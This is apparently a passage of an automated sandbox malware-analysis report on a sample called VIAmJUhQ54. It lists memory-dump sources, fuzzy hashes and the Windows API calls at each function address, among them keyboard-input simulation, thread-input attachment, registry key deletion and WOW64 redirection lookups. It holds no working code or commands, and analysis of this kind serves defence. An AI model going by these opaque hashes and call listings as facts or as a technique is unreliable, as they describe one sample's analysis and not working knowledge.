                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-3689287502
                                                                                • Opcode ID: e276ec997b4dcf1a1194fb8faf5e3d49e0e34811def864ac68530e42c2641a33
                                                                                • Instruction ID: f05ea338035f45f0df249f2329c99b5a9e8d53b38c0a5db5148b437c0a30834e
                                                                                • Opcode Fuzzy Hash: e276ec997b4dcf1a1194fb8faf5e3d49e0e34811def864ac68530e42c2641a33
                                                                                • Instruction Fuzzy Hash: CDD0A7708007229FD7308F70F80860177E4BF22725B01851EE482E2650D7BCDC818610
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0076052F,?,007606D7), ref: 00760572
                                                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00760584
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                • API String ID: 2574300362-1587604923
                                                                                • Opcode ID: dbccc826c7e3b70a6ad87938867156bd21287513cb1d66fbb1e35f84bedd6a45
                                                                                • Instruction ID: c82891becb317bcdabcd77c69af34e8d7bd43402c8f1b9ce85b30425511a3b65
                                                                                • Opcode Fuzzy Hash: dbccc826c7e3b70a6ad87938867156bd21287513cb1d66fbb1e35f84bedd6a45
                                                                                • Instruction Fuzzy Hash: 50D05E704003229AC7205F60E808A027BF5AB15301B11881BEC8392651D678C8828A60
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,0076051D,?,007605FE), ref: 00760547
                                                                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00760559
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                • API String ID: 2574300362-1071820185
                                                                                • Opcode ID: 5130cfb5b8a19091ff2d5302c7c4fa097b31e71ff4e3f2eced450de728d7b051
                                                                                • Instruction ID: 4840816eb40ae403156a8603d5619aacbbf0933725ca978e6a4bb5214fdc24f6
                                                                                • Opcode Fuzzy Hash: 5130cfb5b8a19091ff2d5302c7c4fa097b31e71ff4e3f2eced450de728d7b051
                                                                                • Instruction Fuzzy Hash: 60D0A7744107129FC7308F60E808A0676F4AB11301B11C81EE847E2662D67CCC828A50
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0077ECBE,?,0077EBBB), ref: 0077ECD6
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0077ECE8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                • API String ID: 2574300362-1816364905
                                                                                • Opcode ID: 809238f30e5675181bff3d07a533dc4b601c6df897c6c6d53329cf7793eb308f
                                                                                • Instruction ID: ebd6bd747c5b7e2723cf4af1606a684a57f3b227f673c6c8fb96f2b6417bb9f8
                                                                                • Opcode Fuzzy Hash: 809238f30e5675181bff3d07a533dc4b601c6df897c6c6d53329cf7793eb308f
                                                                                • Instruction Fuzzy Hash: 35D0A7754007239FCF315F60EC4860277F4AF05341B01C45EF84AD2651DB7CCC818A20
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0077BAD3,00000001,0077B6EE,?,007BDC00), ref: 0077BAEB
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0077BAFD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                • API String ID: 2574300362-199464113
                                                                                • Opcode ID: e5d4e2fa18395d6556a76b6e0dcfcec88cf1b16167254dbb81e7d7bb5ca4a433
                                                                                • Instruction ID: bc44c0ba8715dcb3154d8b8a824e1e7bfc5573561840039a730d5b3a30ec7437
                                                                                • Opcode Fuzzy Hash: e5d4e2fa18395d6556a76b6e0dcfcec88cf1b16167254dbb81e7d7bb5ca4a433
                                                                                • Instruction Fuzzy Hash: 2FD0A7B09007129FCB305F60E848F1177E4AF05341B01C41EEC47D2660D77CCC81C614
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00783BD1,?,00783E06), ref: 00783BE9
                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00783BFB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2574300362-4033151799
                                                                                • Opcode ID: 73e1feebe962c9b298083ed0e93085d1bbfe6e6f83c33a55cb0b4e8413a405be
                                                                                • Instruction ID: b4ed9bc5172bb688a058437b9231637962f561987ca421f153ed507a23d594df
                                                                                • Opcode Fuzzy Hash: 73e1feebe962c9b298083ed0e93085d1bbfe6e6f83c33a55cb0b4e8413a405be
                                                                                • Instruction Fuzzy Hash: DBD0A7B14407169FC7306FA4EC08603BAF4AB02715B11841AE447E2690D7BCC8808F20
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 85d86c7a0aff74b47039a1bf7bde4f34cdcc0e4c109d81ef04b84303ac796974
                                                                                • Instruction ID: 2a744b02c4c9d40970a4195935536b463d2ca834fd70a13c811fe13f1a2d3709
                                                                                • Opcode Fuzzy Hash: 85d86c7a0aff74b47039a1bf7bde4f34cdcc0e4c109d81ef04b84303ac796974
                                                                                • Instruction Fuzzy Hash: 87C17D75A0021AEFCB14CFA4C884AEEB7B5FF48711F104598EE05AB251D7B4EE45DBA0
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0077AAB4
                                                                                • CoUninitialize.OLE32 ref: 0077AABF
                                                                                  • Part of subcall function 00760213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0076027B
                                                                                • VariantInit.OLEAUT32(?), ref: 0077AACA
                                                                                • VariantClear.OLEAUT32(?), ref: 0077AD9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                • String ID:
                                                                                • API String ID: 780911581-0
                                                                                • Opcode ID: 42b52a4663a1e2964b90df8c94e52db4c466b92317d7ed7be843643b6796f86e
                                                                                • Instruction ID: 4660891024d04aa39a5c7a0995f79208f4a22ad09cf757a74d4947c584489097
                                                                                • Opcode Fuzzy Hash: 42b52a4663a1e2964b90df8c94e52db4c466b92317d7ed7be843643b6796f86e
                                                                                • Instruction Fuzzy Hash: 7BA13575204711EFEB11EF14C485A1EB7E4BF88750F148459FA9A9B3A2CB38ED00CB96
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                • String ID:
                                                                                • API String ID: 2808897238-0
                                                                                • Opcode ID: 887001c2a9e5fe479e654a91938c6061ee71838d4ec22828bf6ecd6f19ea3048
                                                                                • Instruction ID: 0c955848d5cc5321dbee48bde56bf5da9fd7efb8cb691c0184c14078e79feefb
                                                                                • Opcode Fuzzy Hash: 887001c2a9e5fe479e654a91938c6061ee71838d4ec22828bf6ecd6f19ea3048
                                                                                • Instruction Fuzzy Hash: BC519530604306DBDB249F65D495AAEB3E5EF55311F20882FEA46CB2D1EBBC9849C705
                                                                                APIs
                                                                                • GetWindowRect.USER32(00D87928,?), ref: 0078C544
                                                                                • ScreenToClient.USER32(?,00000002), ref: 0078C574
                                                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0078C5DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                • String ID:
                                                                                • API String ID: 3880355969-0
                                                                                • Opcode ID: 54f68e54f373521b99ec76251b608da87fd8d28e0020826167b625a868b2822f
                                                                                • Instruction ID: 20791ac4178d85412d575c804cf84e4fd180e994880d5c46cd6e90594335fe11
                                                                                • Opcode Fuzzy Hash: 54f68e54f373521b99ec76251b608da87fd8d28e0020826167b625a868b2822f
                                                                                • Instruction Fuzzy Hash: A0516275A40104EFCF21EF68C8819AE7BB5FF59320F208269F9559B290D738ED41CBA0
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0075C462
                                                                                • __itow.LIBCMT ref: 0075C49C
                                                                                  • Part of subcall function 0075C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0075C753
                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0075C505
                                                                                • __itow.LIBCMT ref: 0075C55A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$__itow
                                                                                • String ID:
                                                                                • API String ID: 3379773720-0
                                                                                • Opcode ID: 481f7bea5324b8cb830126296ea4eafc60c9abf818594c576ccd46bd60a44d3c
                                                                                • Instruction ID: b2062beee408cd9edb232423b23c1871b9fbbf5911f16faab5a3a37449bdc7d7
                                                                                • Opcode Fuzzy Hash: 481f7bea5324b8cb830126296ea4eafc60c9abf818594c576ccd46bd60a44d3c
                                                                                • Instruction Fuzzy Hash: 8741D771A00318AFDF22DF54D859FEE7BB5AF55701F000019FD05A7281DBB89A59CBA1
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00763966
                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00763982
                                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 007639EF
                                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00763A4D
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 7feae870913cb22083e6e5c54adbaecc2670771450045a2f972ede5136e75e07
                                                                                • Instruction ID: beeca405c125c0ba144bf824650ab02dc9d481f7aa4a2cc5053a03adf83bcaed
                                                                                • Opcode Fuzzy Hash: 7feae870913cb22083e6e5c54adbaecc2670771450045a2f972ede5136e75e07
                                                                                • Instruction Fuzzy Hash: 44410770E04748AAEF318B648809BFDBBB59B55314F08415AFCC3922C1C7BC9E95DB65
                                                                                APIs
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0078B5D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateRect
                                                                                • String ID:
                                                                                • API String ID: 634782764-0
                                                                                • Opcode ID: da10ef046c99ee70ec0cce615901d2d86f6976977227bb88e2337f025fd9a5d5
                                                                                • Instruction ID: f4fe664c225aa8c7af397bf09845441cbbaac32d4f26ae5a8cae486cb0460f6b
                                                                                • Opcode Fuzzy Hash: da10ef046c99ee70ec0cce615901d2d86f6976977227bb88e2337f025fd9a5d5
                                                                                • Instruction Fuzzy Hash: 2131C274681104FFEF30AF18CC89FA87765AB4A350F548111FA52D62E1D73CA9509B55
                                                                                APIs
                                                                                • ClientToScreen.USER32(?,?), ref: 0078D807
                                                                                • GetWindowRect.USER32(?,?), ref: 0078D87D
                                                                                • PtInRect.USER32(?,?,0078ED5A), ref: 0078D88D
                                                                                • MessageBeep.USER32(00000000), ref: 0078D8FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 1352109105-0
                                                                                • Opcode ID: 26cf50fc94ed1b8f8e481c6e6854978264accce0011dda0e35b57fa2fc2103b9
                                                                                • Instruction ID: c79664a802a3246c9e8b020e3df93b0e0c7f76a5516eaf38ca8f89c31677fd5d
                                                                                • Opcode Fuzzy Hash: 26cf50fc94ed1b8f8e481c6e6854978264accce0011dda0e35b57fa2fc2103b9
                                                                                • Instruction Fuzzy Hash: 7D418970A40258DFCB21EF59D885BA9BBF5FB49320F1881A9E815DF2A0D738ED41CB40
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00763AB8
                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00763AD4
                                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00763B34
                                                                                • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00763B92
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 0b5361c93a12cfe1e19e4debd3880af9b32b09e7b58d551ed395d8bdda881649
                                                                                • Instruction ID: 19ea504855c0020dc64bdd0fc2e9d8a1e6957c825ae47bcf7cd93142478f2fb5
                                                                                • Opcode Fuzzy Hash: 0b5361c93a12cfe1e19e4debd3880af9b32b09e7b58d551ed395d8bdda881649
                                                                                • Instruction Fuzzy Hash: 6031E3B0E00258AEEF318B64C819BFE7BA99B56310F04015AEC8B972D2C77D8F45D765
                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00754038
                                                                                • __isleadbyte_l.LIBCMT ref: 00754066
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00754094
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007540CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: 35216e8610586ff062d8264f2ea7b39443c3a05e3f0978577d9a79ae83825f8a
                                                                                • Instruction ID: 01a2690ff969e1af4d3b72b6a2ec8538190bda6bbd9a825b17b98b2cf29759ca
                                                                                • Opcode Fuzzy Hash: 35216e8610586ff062d8264f2ea7b39443c3a05e3f0978577d9a79ae83825f8a
                                                                                • Instruction Fuzzy Hash: B031D431504209EFDB219F75C844BEA7BA5FF41316F2540A8EA598B0D0E779DCD4DB90
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 00787CB9
                                                                                  • Part of subcall function 00765F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00765F6F
                                                                                  • Part of subcall function 00765F55: GetCurrentThreadId.KERNEL32 ref: 00765F76
                                                                                  • Part of subcall function 00765F55: AttachThreadInput.USER32(00000000,?,0076781F), ref: 00765F7D
                                                                                • GetCaretPos.USER32(?), ref: 00787CCA
                                                                                • ClientToScreen.USER32(00000000,?), ref: 00787D03
                                                                                • GetForegroundWindow.USER32 ref: 00787D09
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                • String ID:
                                                                                • API String ID: 2759813231-0
                                                                                • Opcode ID: f1f140d4552a7dd767636afe56af2c307d2ce15c665967b4172719cb4e234049
                                                                                • Instruction ID: 1b6d0e3f682605fa434ab6d4f849ce3a89ce406f87492efdd3267fc5419fb023
                                                                                • Opcode Fuzzy Hash: f1f140d4552a7dd767636afe56af2c307d2ce15c665967b4172719cb4e234049
                                                                                • Instruction Fuzzy Hash: 8F31FE72900108AFDB11EFA5D8459EFBBF9EF98314F118466E816E7212DA359E05CBA0
                                                                                APIs
                                                                                  • Part of subcall function 0073B34E: GetWindowLongW.USER32(?,000000EB), ref: 0073B35F
                                                                                • GetCursorPos.USER32(?), ref: 0078F211
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0079E4C0,?,?,?,?,?), ref: 0078F226
